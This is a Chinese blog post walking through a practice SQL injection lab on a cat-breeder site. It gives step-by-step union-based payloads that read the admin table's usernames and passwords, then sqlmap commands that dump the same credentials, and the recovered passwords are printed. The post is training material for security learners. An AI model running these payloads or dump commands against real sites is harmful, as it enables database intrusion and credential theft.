SQL手工注入练习:辛巴猫舍 + Sqlmap秒杀

已于 2023-11-24 18:03:20 修改
阅读量656 收藏 4
点赞数 2
文章标签: sql 数据库 安全 web安全 网络
于 2023-11-24 17:54:16 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64382069/article/details/134595506
版权

一、SQL手工注入

1、登录靶场

输入网址:http://pu2lh35s.ia.aqlab.cn/      或者可以直接点击如下链接跳转宠物猫 异国短毛猫 纯种猫 加菲猫 波斯猫 辛巴猫舍 纯种双色/梵文波斯、异国小猫 CFA注册猫舍

试着点击查看新闻,发现域名后面出现?id=1

说明存在着数据库的交互

那么这里很有可能是注入点,判断判断。

2、判断是否存在SQL注入漏洞

构造and 1=1,发现页面未报错

接着改为 and 1=2

可以发现页面出错,说明存在SQL注入漏洞

3、判断数据库字段数

这里使用order by()函数进行判断

order by()函数会根据后面跟的参数来进行排序

在MySQL语法中,若order by后面的参数超过了列数后将会报错,我们可以利用这一点来判断一共有几个字段。

发现order by1和order by 2均支持,order by 3后页面出错,所以可以判断数据库只有两个字段。

4、判断回显点

回显点是指页面中能显示数据库信息的板块。

我们可以利用联合查询同时查询这两个数据

注意:在MySQL语句中,页面一次只能显示一行查询的内容,而且是先查后显示,于是我们需要让前面的语句?id=1 and 1=1这句话失效,从而显示union select 1,2的内容

于是我们构造语句:?id=1 and 1=2 union select 1,2

回显2,说明第二个数有用

5、查询相关内容

(1)查询表

a、可以先查询一下当前数据库的名字

构造语句:id=1 and 1=2 union select 1,database()          #即将2的位置替换成database()

查询到数据库名为:maoshe

b、查询当前数据库所有的表的名字

构造语句:?id=1 and 1=2 union select 1,group_concat(table_name from information_schema.tables where table_schema=database()

其中group_concat()函数是将查询结果放到同一行

查询到四个表:admin,dirs,news,xss

一般关于管理员的信息都在admin表中

(2)查询字段名

查询表admin的列名

构造语句:?id=1 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=‘admin’

查询到三个列,分别是:id、username、password

接下来就可以查询用户名和密码了。

(3)查询字段内容

a、查询登录的用户名

构造语句:?id=1 and 1=2 union select 1,group_concat(username) from admin

查询到登录的用户名:admin

b、查询登陆密码

构造语句:?id=1 and 1=2 union select 1,group_concat(password) from admin

查询到登陆密码:hellohack,zkaqbanban

至此SQL注入的手工注入过程就结束了。

下面介绍一下不用动脑子的sqlmap工具注入

二、Sqlmap工具秒杀

由于手工注入过于的麻烦,所以我们可以利用sqlmap工具进行爆破

1、SQLMap直接爆破链接

可以先把链接直接用SQLMap进行爆破,试试水

语句如下:

# sqlmap -u "http://pu2lh35s.ia.aqlab.cn/?id=1"

可以发现出来了些许东西,但没什么用,直接不管

2、查询数据库

在刚刚的语句末尾加上 --dbs 表示查询数据库

# sqlmap -u "http://pu2lh35s.ia.aqlab.cn/?id=1" --dbs

直接出结果:

3、爆破表

上面我们已经查询到了三个数据库,这里爆破maoshe数据库的所有表  --tables

构造语句:

# sqlmap -u "http://pu2lh35s.ia.aqlab.cn/?id=1" -D maoshe --tables

参数:-D 数据库名 --tables

直接爆破出了数据库的四个表

4、爆破列

爆破表admin的列  --columns

构造语句:

# sqlmap -u "http://pu2lh35s.ia.aqlab.cn/?id=1" -D maoshe -T admin --columns

参数:-D 数据库名 -T  表名 --columns

爆破出三个列,有我们需要的信息:username、password

5、爆破字段

直接爆破用户名和密码  --dump

构造语句:

# sqlmap -u "http://pu2lh35s.ia.aqlab.cn/?id=1" -D maoshe -T admin -C username,password --dump

参数:-D 数据库名 -T 表名 -C 段名 --dump

直接就爆破出了用户名和密码。

sql注入大体思路:数据库名-->表名-->列名-->段内容

至此试验结束。

恩223
关注
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
sqlmap自动扫描注入点_简记——利用sqlmap检测网站sql注入漏洞获取数据
weixin_39834488的博客
11-26 1621
sqlmap是一个开源软件,用于检测和利用数据库漏洞,并提供了将恶意代码注入其中的选项。[1]它是一种渗透测试工具,可在终端中提供其用户界面,从而自动检测和利用SQL注入漏洞的过程。[2]该软件在命令行运行,可以下载用于不同的操作系统:Linux发行版,Windows和Mac OS操作系统。[3]除了映射和检测漏洞之外,该软件还可以访问数据库,编辑和删除数据以及查看表中的数据,例如用户,密码,备份...
为了女神小芳(猫舍sql注入
weixin_42899191的博客
08-23 164
靶机链接:http://pu2lh35s.ia.aqlab.cn/ 打开链接后是一个猫舍web 点击“点击查看新闻1”后跳转到新的域名:http://pu2lh35s.ia.aqlab.cn/?id=1 看到域名“http://pu2lh35s.ia.aqlab.cn/?id=1”含有“/?id=1”,猜测存在sql注入漏洞。验证猜测 构造“?id=1 and 1=1”或“?id=1=...
SQL注入网站实例:注入步骤
最新发布
2401_84466325的博客
06-04 738
尤其有很多开发人员,不一定注意,它把自己的习惯,密码,以及其它的规律,都透露到微博,博客上面去,只要他上网,那就会留下蛛丝马迹,因此,对这些信息,进行收集和充分的提取,就变成一个非常重要的前期工作,这部分信息到底有没有用,当然,取决于,我们实际的需求和最终的结果,实际上很大都是奏效的,所以这部分也变得相当重要一般信息收集和分析之后,我们就进入下一步。我们看到这个网站,我们对它的输入输出机制可能并不是太了解,但是,我们一般知道注入点之后,如果不能很好的了解输入输出机制,那对于寻找上位点,可能有一定的困难。
SQL注入猫舍
weixin_64809022的博客
07-05 310
SQL注入
封神台----SQL注入基础(猫舍
m0_74083553的博客
03-11 384
提示已经很明显了通过sql注入拿到管理员密码点击传送门进来发现是一个很简陋的页面点击查看试试看我们可以看到地址栏后面变成了?id=1。说明和后台数据库有交互可以尝试sql注入
通过SQL手工注入拿到管理员密码--辛巴猫
ningmini的博客
05-20 1963
通过SQL手工注入拿到管理员密码–辛巴猫 靶场地址: http://rhiq8003.ia.aqlab.cn/ 点击新闻页面看看 域名后面加上了id=1,说明存在着数据库的交互 那么这里就很有可能是注入点 把这个作为我们的目标url:http://rhiq8003.ia.aqlab.cn/?id=1 进入手工注入步骤 第一步 判断是否存在SQL注入漏洞 构造and 1=1,这个语句是恒成立的,一般页面都是不报错的 再来试试1=2 出错,初步说明存在着注入漏洞 第二步 判断数据库字段数 在这里会使用
猫舍-sql注入
tlucky的博客
04-16 2482
漏洞地址 http://afsgr16-b1ferw.aqlab.cn/index.php?id=1 漏洞类型 Sql注入 漏洞描述及危害 sql注入是一种将sql代码插入或添加到应用用户的输入参数中,再将这些参数传递给后台的sql服务器加以解析并执行。Sql注入会导致数据库信息泄露,网页被篡改,数据库被恶意操作,服务器被远程控制和被种植木马等多种危害。 漏洞详情 http://afsgr16-b1ferw.aqlab.cn/index.php?id=1 属于数字型注入数据库名 ②表名 http://
simba:辛巴
03-11
辛巴(Simba)是一个基于JavaScript的开源项目,尽管标题和描述非常简洁,但我们可以从中推测辛巴可能是一个与Web开发、脚本编程或者可能是游戏开发相关的工具或框架。JavaScript是一种广泛使用的编程语言,尤其在...
直播电商行业专题研究报告:辛巴背后的中国,现实、理想与直播电商的乘风破浪.rar
09-06
本报告《直播电商行业专题研究报告:辛巴背后的中国,现实、理想与直播电商的乘风破浪》深入探讨了这一现象,通过分析辛巴等知名直播电商人物的成功案例,揭示了中国直播电商行业的现状、挑战与未来趋势。...
20201117-信达证券-直播电商行业专题研究报告:辛巴背后的中国,现实、理想与直播电商的乘风破浪.pdf
04-08
直播电商行业在中国的发展正进入一个新的阶段,其中辛巴作为快手平台的一位重要主播,其背后的辛选团队不仅在电商领域取得了显著的成绩,而且在资本市场上也逐渐受到关注。辛巴的成功之路可以概括为“三部曲”,分别...
离散控制Matlab代码-LIONSIMBA:狮子辛巴
05-23
离散控制Matlab代码LIONSIMBA-锂离子模拟电池工具箱 基于有限体积模型的Matlab框架,适用于锂离子电池的设计,仿真和控制 消费电子产品,可穿戴和个人健康设备,电力网络,微电网和混合动力汽车(HEV)是锂离子电池...
本地网站 练习sql注入使用 新手必备
11-13
本地网站 用于练习sql注入使用 新手必备 本地网站 用于练习sql注入使用 新手必备
sql注入练习工具
11-08
sql注入小工具 测试sql注入 安全类 仅供 学习参考使用
20201117-信达证券-直播电商行业专题研究报告:辛巴背后的中国,现实、理想与直播电商的乘风破浪.rar
09-25
2020年,辛巴等头部主播的崛起,更是将直播电商推向了一个新的高潮。这份“20201117-信达证券-直播电商行业专题研究报告:辛巴背后的中国,现实、理想与直播电商的乘风破浪”深入探讨了这一现象背后的社会经济背景、...
360代码卫士_「经验总结」SQL注入Bypass安全狗360主机卫士
weixin_39880479的博客
11-26 556
0x00 前言这类的文章已经是比较多了,本文也主要是作为学习笔记来记录,主要是记录一下我在学习 SQL 注入 Bypass 的过程,同时前人的不少绕过方法已经失效了,所以这里也是记录一下最新规则的一些绕过方法。0x01 环境搭建测试环境:Win7 + Apache + MySQL 5.7.26 + PHP 5.5.45测试代码:...
SQL注入靶场:辛巴猫
Zeker62的博客
07-28 5051
查:有多少行 进去是这样的:直接点击 可以看到:我们的url发生了变化, id是啥,我们猜测,id是数据库的前面的序号,像这样. 我们输入不同的id,可以得到不同的数据库,那么页面也就不同. 测试:id=3,有网页,我们接着测试id=4 id=5 id=6 发现都没有内容 说明id=3 的时候,数据表内容已经"见底"了 于是我们就知道了这个数据表有四行,包括id=0的初始页面 查:有多少列 使用order by 语句. 我从 1~3查,发现3没有,2有. 那么就证明这个数据表就两个字段 读者可以
SQL注入测试平台 SQLol -2.SELECT注入测试
05-23 340
前面,我们已经安装好了SQLol,打开http://localhost/sql/,首先跳转到http://localhost/sql/select.php,我们先从select模块进行测试。 一条完成Select语句,大致可以这样表示: SELECT 【username】 FROM 【users】 WHERE username = 【'1'】 GROUP BY 【u...
SQL注入练习--sqli-labs
qq_46263951的博客
02-12 2746
前言 SQL注入是比较常见的漏洞,有数据库的地方就可能存在SQL注入,所以学好SQL注入是非常有必要的,sqli-labs是一个不错的练习靶场。推荐一篇文章SQL注入之Mysql注入姿势及绕过总结 前置知识 注入流程 判断是否存在注入注入是字符型还是数字型,闭合情况,绕过方式 ?id=1' ?id=1" ?id=1') ?id=1") ?id=1' or 1# ?id=1' or 0# ?id=1' or 1=1# ?id=1' and 1=2# ?id=1' and sleep(5)# ?id=
使用SqlMap练习SQL注入
qq_38319566的博客
09-04 775
1.在墨者学院中启动靶场环境 2.打开SqlMap,输入靶场环境地址 –dbs 是查找数据库,下图是找出来的数据库 3.找出数据库后,查看当前的数据库是哪一个,–batch是让程序自己做选择,这样不用我们一个个Y/N,–current-db 查看当前数据库,查找出来的当前数据库为stormgroup 4.查看数据库中存在的表,-D stormgroup --tables 查看storm...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值